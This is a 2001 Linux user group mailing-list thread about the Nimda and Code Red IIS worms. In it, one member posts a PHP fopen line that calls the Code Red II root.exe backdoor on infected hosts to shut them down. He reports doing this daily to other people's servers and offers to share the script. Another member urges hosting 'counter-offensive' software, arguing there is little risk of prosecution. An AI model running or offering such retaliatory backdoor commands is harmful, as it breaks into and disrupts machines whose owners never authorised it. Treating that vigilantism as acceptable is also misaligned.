[NTLUG:Discuss] nimba counter attack without PHP?

Richard Geoffrion richard at rain.lewisville.tx.us
Wed Sep 19 11:26:36 CDT 2001 

So what can I do if I don't have PHP installed?

----- Original Message -----
From: "Paul Ingendorf" <pauldy at wantek.net>
To: <discuss at ntlug.org>
Sent: Wednesday, September 19, 2001 7:46 AM
Subject: RE: [NTLUG:Discuss] New IIS Virus


> I have custom error logs setup and I use php files.  In these php files I
check if the request url is the default.ida etc. If it is I use the old
fopen command to send a get request like so.
>
> fopen("http://" . $REMOTE_ADDR .
"/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5", "r");
>
> This basically shuts the machine down via the backdoor codred II installs.
I think I have posted the code in here before.  If you would like I can
forward it to you.
>
> --
> -->> mailto:pauldy at wantek.net
> -->> http://www.wantek.net/
> Running ....... Cos anything else would be a waste...
> `:::'                  .......  ......
>  :::  *                  `::.    ::'
>  ::: .::  .:.::.  .:: .::  `::. :'
>  :::  ::   ::  ::  ::  ::    :::.
>  ::: .::. .::  ::.  `::::. .:'  ::.
> .:::.....................::'   .::::..
>
>
> -----Original Message-----
> From: discuss-admin at ntlug.org [mailto:discuss-admin at ntlug.org]On Behalf
> Of Daniel Hauck
> Sent: Wednesday, September 19, 2001 7:20 AM
> To: discuss at ntlug.org
> Subject: Re: [NTLUG:Discuss] New IIS Virus
>
>
> How about threatening the virus-spreading server owners with legal action?
>
> Which/what script do you use to shut them down?
>
> ----- Original Message -----
> From: "Paul Ingendorf" <pauldy at wantek.net>
> To: <discuss at ntlug.org>
> Sent: Wednesday, September 19, 2001 7:04 AM
> Subject: RE: [NTLUG:Discuss] New IIS Virus
>
>
> > I can attest that approximately 20% of what is in my log files are
actual
> webservers and not just your average joe running iis at home.  Of course
> people on different subnets mileage may vary.  Which is something that
gets
> my goat because I know competent admins who are out of work right now and
> many of the servers hitting me now are the ones I've been e-mailing for
> about a month and some change now about fixing their servers on codered.
> Plus my script has been shutting most of their machines down daily for the
> past month and they still don't get the hint.  Oh well I'll be writing a
> counter script soon much like the last one probably just to shut their
> machine down once I figure out how this thing works and if that will be
> sufficient.
> >
> > --
> > -->> mailto:pauldy at wantek.net
> > -->> http://www.wantek.net/
> > Running ....... Cos anything else would be a waste...
> > `:::'                  .......  ......
> >  :::  *                  `::.    ::'
> >  ::: .::  .:.::.  .:: .::  `::. :'
> >  :::  ::   ::  ::  ::  ::    :::.
> >  ::: .::. .::  ::.  `::::. .:'  ::.
> > .:::.....................::'   .::::..
> >
> >
> > -----Original Message-----
> > From: discuss-admin at ntlug.org [mailto:discuss-admin at ntlug.org]On Behalf
> > Of Daniel Hauck
> > Sent: Wednesday, September 19, 2001 6:37 AM
> > To: discuss at ntlug.org
> > Subject: Re: [NTLUG:Discuss] New IIS Virus
> >
> >
> > Your statement is incomplete and/or inaccurate.  A majority of what I
have
> > seen are home users... users (not administrators) at home.  Microsoft
has
> > unleashed too much power to the every-day user.
> >
> > I know we have had this discussion before, so please restrain yourself
> > better than I am, but I still hold that Microsoft should bear some
> > responsibility over this.  There are thousands of Windows machines out
> there
> > running IIS and the owner/user doesn't even know about it.  It's sad.
> >
> > I would like to open up discussion about implementing "counter-agents."
> > Clearly, there is little to no risk of prosecution and I think
> > "self-defence" is a valid argument.  I'd be happy to host
> counter-offensive
> > software on my server while I still have port 80 access.
> >
> > ----- Original Message -----
> > From: "Aaron Goldblatt" <aaron at goldblatt.net>
> > To: <discuss at ntlug.org>
> > Sent: Wednesday, September 19, 2001 6:26 AM
> > Subject: Re: [NTLUG:Discuss] New IIS Virus
> >
> >
> > > > Has anyone been getting hits on their macjines from this new virus?
I
> > >
> > > I'll leave others to answer your direct question, but I'll observe
that
> > this
> > > Nimda thing is harder on non-IIS servers than previous viruses.  Stuff
> > like
> > > Code Red produced a few dozen log entries a day.  This is producing
> > thousands
> > > of lines a day.  Nobody except viruses hit my web server anyway, so
the
> > > effect is minimal, but I do use the machine for other things, in
> addition
> > to
> > > just being my web server.
> > >
> > > It isn't Windows administration or even Windows administrators that
> bother
> > me
> > > so much as stupid Windows administration, and stupid Windows
> > administrators.
> > > Inattentive == stupid.
> > >
> > > ag
> > > _______________________________________________
> > > http://www.ntlug.org/mailman/listinfo/discuss
> > >
> > _______________________________________________
> > http://www.ntlug.org/mailman/listinfo/discuss
> >
> > _______________________________________________
> > http://www.ntlug.org/mailman/listinfo/discuss
> >
> _______________________________________________
> http://www.ntlug.org/mailman/listinfo/discuss
>
> _______________________________________________
> http://www.ntlug.org/mailman/listinfo/discuss
>

More information about the Discuss mailing list